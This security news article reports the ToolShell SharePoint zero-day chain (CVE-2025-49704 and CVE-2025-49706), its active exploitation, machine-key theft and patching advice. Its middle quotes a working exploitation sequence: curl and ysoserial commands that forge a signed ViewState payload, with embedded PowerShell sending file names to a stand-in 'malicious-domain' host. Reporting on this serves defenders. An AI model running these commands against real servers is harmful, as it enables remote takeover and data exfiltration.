ToolShell: New SharePoint RCE Zero-Day Chain Under Active Global Exploitation

On the evening of July 18, 2025, Eye Security identified an active, large-scale exploitation of a newly discovered Microsoft SharePoint remote code execution (RCE) vulnerability chain, dubbed ToolShell. This sophisticated attack, leveraging vulnerabilities CVE-2025-49704 and CVE-2025-49706, has resulted in unauthenticated attackers gaining full control of on-premise SharePoint servers worldwide.

“This wasn’t a credential issue. This was a weaponized Pwn2Own exploit already being used in the wild,” Eye Security emphasized.

ToolShell is a two-step unauthenticated RCE exploit chain:

• CVE-2025-49706 (CVSS 6.3): SharePoint Server spoofing vulnerability
• CVE-2025-49704 (CVSS 8.8): SharePoint RCE vulnerability via ToolPane endpoint

Initially believed to require valid credentials, deeper investigation revealed that no authentication was needed. According to the report, “POST request to /_layouts/15/ToolPane.aspx seemed rather specific… we developed a feeling that credentials were never used.”

The attack leverages a previously demonstrated Pwn2Own proof-of-concept by Code White GmbH, now fully operational and weaponized. Once exploited, it allows adversaries to drop stealthy ASPX payloads—without logging in.

Among the payloads observed was a crafted file, spinstall0.aspx, likely based on Sharpyshell, designed not for immediate command execution but to steal cryptographic machine keys.

“This wasn’t your typical webshell… Instead, the page invoked internal .NET methods to read the SharePoint server’s MachineKey configuration.”

These keys, such as the ValidationKey and DecryptionKey, are used to generate valid __VIEWSTATE tokens—a critical security mechanism in ASP.NET. With them, attackers can sign their own payloads and achieve full remote code execution using tools like ysoserial.

# grabbing the <VIEWSTATE_GENERATOR> via any public available SharePoint page, like start.aspx
curl -s https://target/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'
# example viewstate payload that can be generated
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://malicious-domain/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify
# by adding the generated token to any request, your command is executed (RCE)
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=<YSOSERIAL_GENERATED_PAYLOAD>

“These payloads can embed any malicious commands and are accepted by the server as trusted input, completing the RCE chain without requiring credentials.”

Eye Security scanned over 8,000 public-facing SharePoint servers and discovered dozens had already been compromised. The payload’s unique 160-byte response size and endpoint (spinstall0.aspx) helped identify affected systems.

As of July 19, Palo Alto Networks Unit 42 confirmed ongoing exploitation, observing attackers:

• Dropping malicious ASPX payloads via PowerShell
• Stealing machine keys to enable persistent access
• Executing modules from suspicious IPs, such as 96[.]9[.]125[.]147

Microsoft has issued urgent guidance and patches for these flaws. If you’re running on-premise SharePoint, immediate steps include:

• Patch to the latest SharePoint version released in July Patch Tuesday
• Scan for signs of compromise, especially at /ToolPane.aspx and /spinstall0.aspx
• Check for leaked cryptographic keys and regenerate them if breached
• Monitor outbound connections and reverse shells via HTTP(S)

Related Posts:

• SharePoint Server Under Active Zero-Day Attack (CVE-2025-53770, CVSS 9.8), No Patch Yet!
• Microsoft’s September Patch Tuesday: A Patchwork of Urgency with 4 Zero-Days Under Attack
• CVE-2024-38094 Exploited: Attackers Gain Domain Access via Microsoft SharePoint Server
• CVE-2024-4177: SSRF Vulnerability Patched in Bitdefender GravityZone Console On-Premise
• Microsoft Enhances Exchange and SharePoint Security with AMSI Integration

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy

Written by

@DdoS · Security Researcher

Do Son

Do Son is the Founder and Editor of SecurityOnline.info. Working in cybersecurity since 2013, he reports on vulnerabilities, malware, and emerging threats, providing timely analysis to help organizations and individuals stay ahead of evolving risks.